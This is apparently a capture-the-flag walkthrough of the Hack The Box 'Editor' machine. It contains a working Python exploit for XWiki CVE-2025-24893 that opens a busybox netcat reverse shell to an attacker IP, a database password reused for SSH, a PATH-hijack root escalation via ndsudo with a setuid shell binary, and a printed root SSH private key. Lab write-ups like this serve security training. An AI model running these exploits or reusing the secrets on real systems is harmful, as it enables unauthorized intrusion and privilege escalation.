Post

Editor

Editor
MachineDifficultyOSRelease
EditorEasyLinux03 Aug 2025Logo

Machine Information

Services may take up to 5 minutes to load.

Recon

Start off with an Nmap scan

1
2
3
4
5
IP=10.129.81.217  

port=$(sudo nmap -p- $IP --min-rate 10000 | grep open | cut -d'/' -f1 | tr '\n' ',' )

nmap -A -p $port $IP       
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
┌──(kali㉿kali)-[~/HTB-machine/editor]
└─$ nmap -A -p $port $IP       
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-03 01:30 EDT
Nmap scan report for wiki.editor.htb (10.129.81.217)
Host is up (0.22s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
| http-title: XWiki - Main - Intro
|_Requested resource was http://wiki.editor.htb/xwiki/bin/view/Main/
| http-methods: 
|_  Potentially risky methods: PROPFIND LOCK UNLOCK
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-robots.txt: 50 disallowed entries (15 shown)
| /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/ 
| /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/ 
| /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/ 
| /xwiki/bin/saveandcontinue/ /xwiki/bin/rollback/ /xwiki/bin/deleteversions/ 
| /xwiki/bin/cancel/ /xwiki/bin/delete/ /xwiki/bin/deletespace/ 
|_/xwiki/bin/undelete/
| http-cookie-flags: 
|   /: 
|     JSESSIONID: 
|_      httponly flag not set
| http-webdav-scan: 
|   Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK
|   Server Date: Sun, 03 Aug 2025 05:30:38 GMT
|   Server Type: nginx/1.18.0 (Ubuntu)
|_  WebDAV type: Unknown
8080/tcp open  http    Jetty 10.0.20
| http-cookie-flags: 
|   /: 
|     JSESSIONID: 
|_      httponly flag not set
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Jetty(10.0.20)
| http-webdav-scan: 
|   Server Type: Jetty(10.0.20)
|   WebDAV type: Unknown
|_  Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK
| http-title: XWiki - Main - Intro
|_Requested resource was http://wiki.editor.htb:8080/xwiki/bin/view/Main/
| http-methods: 
|_  Potentially risky methods: PROPFIND LOCK UNLOCK
| http-robots.txt: 50 disallowed entries (15 shown)
| /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/ 
| /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/ 
| /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/ 
| /xwiki/bin/saveandcontinue/ /xwiki/bin/rollback/ /xwiki/bin/deleteversions/ 
| /xwiki/bin/cancel/ /xwiki/bin/delete/ /xwiki/bin/deletespace/ 
|_/xwiki/bin/undelete/
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, Linux 5.0 - 5.14
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   201.63 ms 10.10.14.1
2   201.59 ms wiki.editor.htb (10.129.81.217)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.25 seconds

Here we have port 22 open and a web server running on ports 80 and 8080.

Update /etc/hosts:

1
echo "10.129.81.217 editor.htb" | sudo tee -a /etc/hosts

Web Server (80)

1
http://editor.htb/

Error loading image

Web Server (8080)

1
http://editor.htb:8080/xwiki/bin/view/Main/

Error loading image

After clicking on the Docs link on the port 80 front page, we are redirected to a new subdomain: wiki.editor.htb.
On this subdomain, the web server is running on port 8080.

Here we have an exploit for this version:

Wiki Platform 15.10.10 - Remote Code Execution

I have modified the exploit. Change the IP and desired port in the code, and set up a Netcat listener:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
import requests
import urllib.parse

# Reverse shell settings
LHOST = "10.10.14.56"  # Change to your IP
LPORT = "1338"          # Change if needed

def exploit(target_url):
    if not target_url.startswith("http"):
        target_url = "http://" + target_url

    # Payload using Groovy to execute a reverse shell using busybox + nc
    cmd = f"busybox nc {LHOST} {LPORT} -e /bin/sh"
    groovy_payload = f'println("{cmd}".execute())'
    
    encoded_payload = urllib.parse.quote(
        "}}}{{async async=false}}{{groovy}}" + groovy_payload + "{{/groovy}}{{/async}}"
    )

    exploit_url = f"{target_url}/bin/get/Main/SolrSearch?media=rss&text={encoded_payload}"

    print(f"[+] Sending payload to: {exploit_url}")
    try:
        requests.get(exploit_url, timeout=10)
        print("[✔] Exploit sent. Check your netcat listener!")
    except requests.exceptions.RequestException as e:
        print(f"[✖] Request failed: {e}")

if __name__ == "__main__":
    print("=" * 60)
    print("XWiki RCE Exploit (CVE-2025-24893) - Reverse Shell Trigger")
    print("Author: Modified by You")
    print("=" * 60)
    url = input("[?] Enter target URL (e.g., http://editor.htb): ").strip()
    exploit(url)

Web Server Behavior

  • http://wiki.editor.htb (port 80) redirects to /xwiki:

    1
    
    Location: http://wiki.editor.htb/xwiki
    
  • http://editor.htb:8080 (port 8080) also redirects to /xwiki:

    1
    
    Location: http://editor.htb:8080/xwiki
    

This indicates the XWiki platform is accessible on both ports.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(kali㉿kali)-[~/HTB-machine/editor]
└─$ curl -I http://wiki.editor.htb

HTTP/1.1 302 Found
Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 03 Aug 2025 07:09:53 GMT
Connection: keep-alive
Location: http://wiki.editor.htb/xwiki

                                                                                                                              
┌──(kali㉿kali)-[~/HTB-machine/editor]
└─$ curl -I http://editor.htb:8080 

HTTP/1.1 302 Found
Location: http://editor.htb:8080/xwiki
Content-Length: 0
Server: Jetty(10.0.20)

Run the exploit, provide the URL, and we get a connection on Netcat.

1
2
3
4
5
6
7
8
9
10
11
                                                                                                                              
┌──(kali㉿kali)-[~/HTB-machine/editor]
└─$ python3 xwiki_rce.py
============================================================
XWiki RCE Exploit (CVE-2025-24893) - Reverse Shell Trigger
Author: Modified by You
============================================================
[?] Enter target URL (e.g., http://editor.htb): http://wiki.editor.htb/xwiki
[+] Sending payload to: http://wiki.editor.htb/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22busybox%20nc%2010.10.14.56%201338%20-e%20/bin/sh%22.execute%28%29%29%7B%7B/groovy%7D%7D%7B%7B/async%7D%7D
[✔] Exploit sent. Check your netcat listener!
                                               
1
2
3
4
5
6
7
┌──(kali㉿kali)-[~/HTB-machine/editor]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.56] from (UNKNOWN) [10.129.81.217] 57894

id
uid=997(xwiki) gid=997(xwiki) groups=997(xwiki)

Making the Shell Stable for Ease of Use

1
2
3
4
$python3 -c 'import pty; pty.spawn("/bin/bash")'
$Ctrl + z
$stty raw -echo; fg
$export TERM=xterm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
python3 -c 'import pty; pty.spawn("/bin/bash")'
xwiki@editor:/usr/lib/xwiki-jetty$ 

xwiki@editor:/usr/lib/xwiki-jetty$ ^Z
zsh: suspended  nc -lvnp 4444
                                                                                                                                                 
┌──(kali㉿kali)-[~/HTB-machine/editor]
└─$  stty raw -echo; fg
[1]  + continued  nc -lvnp 4444
                               export TERM=xterm
xwiki@editor:/usr/lib/xwiki-jetty$ 
xwiki@editor:/usr/lib/xwiki-jetty$ ls
jetty  start.d          start_xwiki_debug.bat  start_xwiki.sh  stop_xwiki.sh
logs   start_xwiki.bat  start_xwiki_debug.sh   stop_xwiki.bat  webapps
xwiki@editor:/usr/lib/xwiki-jetty$ cd webapps/
xwiki@editor:/usr/lib/xwiki-jetty/webapps$ 
xwiki@editor:/usr/lib/xwiki-jetty/webapps$ ls
root  xwiki

Here, under /usr/lib/xwiki-jetty/webapps/xwiki/WEB-INF, we found the file hibernate.cfg.xml, which contains credentials.

The file — hibernate.cfg.xml — is a Hibernate configuration file, typically used in Java applications that rely on Hibernate ORM (Object Relational Mapping) to manage database interactions.

File Type:

  • Type: XML configuration file for Hibernate
  • Purpose: Defines database connection settings, Hibernate properties, and mappings for ORM.

Key Details in File:

  • Database URL:

    1
    
    <property name="hibernate.connection.url">jdbc:mysql://localhost/xwiki?...</property>
    
  • Username:

    1
    
    <property name="hibernate.connection.username">xwiki</property>
    
  • Password (sensitive):

    1
    
    <property name="hibernate.connection.password">theEd1t0rTeam99</property>
    
  • Mappings: Specifies Hibernate mapping files:

    1
    
    <mapping resource="xwiki.hbm.xml"/>
    

This file is very useful during web app enumeration or local file read vulnerabilities, especially because it often contains database credentials like in this case.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
xwiki@editor:/usr/lib/xwiki-jetty/webapps/xwiki/WEB-INF$ ls
cache                           jetty-web.xml  version.properties
classes                         lib            web.xml
fonts                           observation    xwiki.cfg
hibernate.cfg.xml               portlet.xml    xwiki-locales.txt
jboss-deployment-structure.xml  sun-web.xml    xwiki.properties
xwiki@editor:/usr/lib/xwiki-jetty/webapps/xwiki/WEB-INF$ cat hibernate.cfg.xml 
<?xml version="1.0" encoding="UTF-8"?>

.
.
.
.
.

    <!-- Configuration for the default database.
         Comment out this section and uncomment other sections below if you want to use another database.
         Note that the database tables will be created automatically if they don't already exist.

         If you want the main wiki database to be different than "xwiki" (or the default schema for schema based
         engines) you will also have to set the property xwiki.db in xwiki.cfg file
    -->
    <property name="hibernate.connection.url">jdbc:mysql://localhost/xwiki?useSSL=false&amp;connectionTimeZone=LOCAL&amp;allowPublicKeyRetrieval=true</property>
    <property name="hibernate.connection.username">xwiki</property>
    <property name="hibernate.connection.password">theEd1t0rTeam99</property>
    <property name="hibernate.connection.driver_class">com.mysql.cj.jdbc.Driver</property>
    <property name="hibernate.dbcp.poolPreparedStatements">true</property>
    <property name="hibernate.dbcp.maxOpenPreparedStatements">20</property>

    <property name="hibernate.connection.charSet">UTF-8</property>
    <property name="hibernate.connection.useUnicode">true</property>
    <property name="hibernate.connection.characterEncoding">utf8</property>
.
.
.
.
.

Here under /home, we have a user oliver. We only have the password to login via SSH.

1
2
3
4
5
6
7
8
9
10
xwiki@editor:/home$ ls
ls
oliver
xwiki@editor:/home$ ls -la
ls -la
total 12
drwxr-xr-x  3 root   root   4096 Jul  8 08:34 .
drwxr-xr-x 18 root   root   4096 Jul 29 11:55 ..
drwxr-x---  3 oliver oliver 4096 Jul  8 08:34 oliver
xwiki@editor:/home$ 
1
2
ssh oliver@editor.htb                
theEd1t0rTeam99
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
┌──(kali㉿kali)-[~/HTB-machine/editor]
└─$ ssh oliver@editor.htb                
The authenticity of host 'editor.htb (10.129.81.217)' can't be established.
ED25519 key fingerprint is SHA256:TgNhCKF6jUX7MG8TC01/MUj/+u0EBasUVsdSQMHdyfY.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:74: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'editor.htb' (ED25519) to the list of known hosts.
oliver@editor.htb's password: 
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-151-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Sun Aug  3 06:21:55 AM UTC 2025

  System load:  0.09              Processes:             230
  Usage of /:   65.1% of 7.28GB   Users logged in:       0
  Memory usage: 47%               IPv4 address for eth0: 10.129.81.217
  Swap usage:   0%


Expanded Security Maintenance for Applications is not enabled.

4 updates can be applied immediately.
To see these additional updates run: apt list --upgradable

4 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm


Last login: Sun Aug 3 06:21:56 2025 from 10.10.14.56
oliver@editor:~$ ls
user.txt
oliver@editor:~$ cat user.txt 
************840744ac6d9c0f983629
oliver@editor:~$ 

Privilege Escalation via ndsudo Binary

After enumerating SUID binaries using the command:

We discovered several binaries with the SUID bit set, including one particularly interesting one:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
oliver@editor:~$ find / -perm -4000 -type f 2>/dev/null
/opt/netdata/usr/libexec/netdata/plugins.d/cgroup-network
/opt/netdata/usr/libexec/netdata/plugins.d/network-viewer.plugin
/opt/netdata/usr/libexec/netdata/plugins.d/local-listeners
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
/opt/netdata/usr/libexec/netdata/plugins.d/ioping
/opt/netdata/usr/libexec/netdata/plugins.d/nfacct.plugin
/opt/netdata/usr/libexec/netdata/plugins.d/ebpf.plugin
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/umount
/usr/bin/chsh
/usr/bin/fusermount3
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/mount
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1

Let’s check the permissions:

1
ls -la /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo

The binary is:

  • Owned by root

  • SUID-enabled

  • Executable only by users in the netdata group

We confirm that our user oliver is a member of the netdata group:

1
2
3
4
5
6
oliver@editor:~$ ls -la /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
-rwsr-x--- 1 root netdata 200576 Apr  1  2024 /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
oliver@editor:~$ 
oliver@editor:~$ groups
oliver netdata
oliver@editor:~$ 

Running the –help flag on the binary shows the allowed commands and expected executables:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
oliver@editor:~$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo --help

ndsudo

(C) Netdata Inc.

A helper to allow Netdata run privileged commands.

  --test
    print the generated command that will be run, without running it.

  --help
    print this message.

The following commands are supported:

- Command    : nvme-list
  Executables: nvme 
  Parameters : list --output-format=json

- Command    : nvme-smart-log
  Executables: nvme 
  Parameters : smart-log  --output-format=json

- Command    : megacli-disk-info
  Executables: megacli MegaCli 
  Parameters : -LDPDInfo -aAll -NoLog

- Command    : megacli-battery-info
  Executables: megacli MegaCli 
  Parameters : -AdpBbuCmd -aAll -NoLog

- Command    : arcconf-ld-info
  Executables: arcconf 
  Parameters : GETCONFIG 1 LD

- Command    : arcconf-pd-info
  Executables: arcconf 
  Parameters : GETCONFIG 1 PD

The program searches for executables in the system path.

Variables given as  are expected on the command line as:
  --variable VALUE

VALUE can include space, A-Z, a-z, 0-9, _, -, /, and .

Among the listed options, the following is of particular interest:

1
2
3
Command    : megacli-disk-info  
Executables: megacli MegaCli  
Parameters : -LDPDInfo -aAll -NoLog  

ndsudo allows executing the megacli binary (searched from the user’s $PATH) as root.

We can hijack the megacli executable by placing our malicious binary at the front of the $PATH. First, we create a C program that escalates privileges and spawns a shell:

megacli.c

1
2
3
4
5
6
7
8
9
#include <unistd.h>
#include <stdlib.h>

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", "-i", NULL);
    return 0;
}

Compile it on your local machine:

1
gcc megacli.c -o megacli

Then upload it to the target and move it to /tmp:

1
2
3
wget http://<your-ip>/megacli
mv megacli /tmp/
chmod +x /tmp/megacli

Update your $PATH to include /tmp at the front:

1
export PATH=/tmp:$PATH

Now, run the ndsudo binary with the vulnerable command:

1
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo megacli-disk-info
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
oliver@editor:~$ wget http://10.10.14.56/megacli
--2025-08-03 06:32:23--  http://10.10.14.56/megacli
Connecting to 10.10.14.56:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16056 (16K) [application/octet-stream]
Saving to: ‘megacli’

megacli                         100%[=====================================================>]  15.68K  61.8KB/s    in 0.3s    

2025-08-03 06:32:23 (61.8 KB/s) - ‘megacli’ saved [16056/16056]

oliver@editor:~$ 
oliver@editor:~$ mv megacli /tmp/
oliver@editor:~$ export PATH=/tmp:$PATH
oliver@editor:~$ 
oliver@editor:~$ 
oliver@editor:~$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo megacli-disk-info
root@editor:/home/oliver# 
root@editor:/home/oliver# ls
megacli.c  user.txt
root@editor:/home/oliver# cd /root
root@editor:/root# 
root@editor:/root# cat root.txt
************a73f795667cf8ae2ba04
root@editor:/root# 
root@editor:/root# 

Persistent

For persistence, simply save the id_rsa key for future access.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
-----BEGIN OPENSSH PRIVATE KEY-----
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
FLvpDdK+RXvFcAAAALcm9vdEBlZGl0b3I=
-----END OPENSSH PRIVATE KEY-----
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌──(kali㉿kali)-[~/HTB-machine/editor]
└─$ ssh -i id_rsa root@editor.htb
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-151-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Sun Aug  3 06:36:56 AM UTC 2025

  System load:  0.48              Processes:             231
  Usage of /:   65.3% of 7.28GB   Users logged in:       0
  Memory usage: 51%               IPv4 address for eth0: 10.129.81.217
  Swap usage:   0%


Expanded Security Maintenance for Applications is not enabled.

4 updates can be applied immediately.
To see these additional updates run: apt list --upgradable

4 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sun Aug 3 06:36:57 2025 from 10.10.14.56
root@editor:~# ls
root.txt  scripts  snap
root@editor:~# 

This post is licensed under CC BY 4.0 by the author.